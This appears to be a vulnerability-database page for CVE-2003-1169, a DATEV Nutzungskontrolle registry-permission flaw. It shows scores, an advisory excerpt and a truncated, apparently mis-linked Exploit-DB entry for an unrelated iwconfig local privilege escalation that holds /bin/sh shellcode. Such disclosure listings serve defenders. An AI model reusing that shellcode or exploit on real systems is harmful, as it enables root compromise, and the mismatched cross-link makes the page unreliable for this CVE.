CVE-2003-1169
published 2003-12-31CVE-2003-1169: DATEV Nutzungskontrolle 2.1 and 2.2 has insecure write permissions for critical registry keys, which allows local users to bypass access restrictions by…
PriorityP415medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
0.82%
52.6th percentile
DATEV Nutzungskontrolle 2.1 and 2.2 has insecure write permissions for critical registry keys, which allows local users to bypass access restrictions by importing NukoInfo values in certain DATEV keys, which disables Nutzungskontrolle.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| datev | nutzungskontrolle | — | — |
| datev | nutzungskontrolle | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Wireless Tools 26 (IWConfig) - Local Privilege Escalation
exploitdb·2005-09-14
CVE-2003-0948 Wireless Tools 26 (IWConfig) - Local Privilege Escalation
Wireless Tools 26 (IWConfig) - Local Privilege Escalation
---
// (if the iwconfig executable is setuid) /str0ke
#include
#include
#include
#include
/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 (https://www.exploit-db.com/exploits/1169/) */
char shellcode[]=
"\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x53\x89\xe1\x31\xd2\xb0"
"\x0b\x51\x52\x55\x89\xe5\x0f\x34"
"\x31\xc0\x31\xdb\xfe\xc0\x51\x52"
"\x55\x89\xe5\x0f\x34";
int main(int argc,char **argv){
char buf[96];
long esp, *addr_ptr;
unsigned long ret;
int i, offset;
unsigned long sp(void)
{ __asm__("movl %esp, %eax");}
char *prog[]={argv[1],buf,NULL};
char *env[]={"3v1lsh3ll0=",shellcode,NULL};
if (argc >= 2) {
printf("\n*********************************************\n");
printf(" iwc
Exploit-DB
DATEV Nutzungskontrolle 2.1/2.2 - Unauthorized Access
exploitdb·2003-11-01
CVE-2003-1169 DATEV Nutzungskontrolle 2.1/2.2 - Unauthorized Access
DATEV Nutzungskontrolle 2.1/2.2 - Unauthorized Access
---
source: https://www.securityfocus.com/bid/8950/info
It has been reported that DATEV Nutzungskontrolle may be prone to a access validation issue that may allow a local attacker to gain access to sensitive data. The issue presents itself as a local user is able modify certain keys in the Windows registry resulting in bypassing the security model of the software. This issue would not present itself if the registry keys were set to read only.
Successful exploitation of this issue may allow an attacker to gain access to sensitive data that could be used to launch further attacks against the system.
Nutzungskontrolle V.2.1 and V.2.2 has been reported to be prone to this issue, however other versions may be affected as well.
It is po
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2003-November/013113.htmlhttp://www.securityfocus.com/bid/8950https://exchange.xforce.ibmcloud.com/vulnerabilities/13589http://lists.grok.org.uk/pipermail/full-disclosure/2003-November/013113.htmlhttp://www.securityfocus.com/bid/8950https://exchange.xforce.ibmcloud.com/vulnerabilities/13589
2003-12-31
Published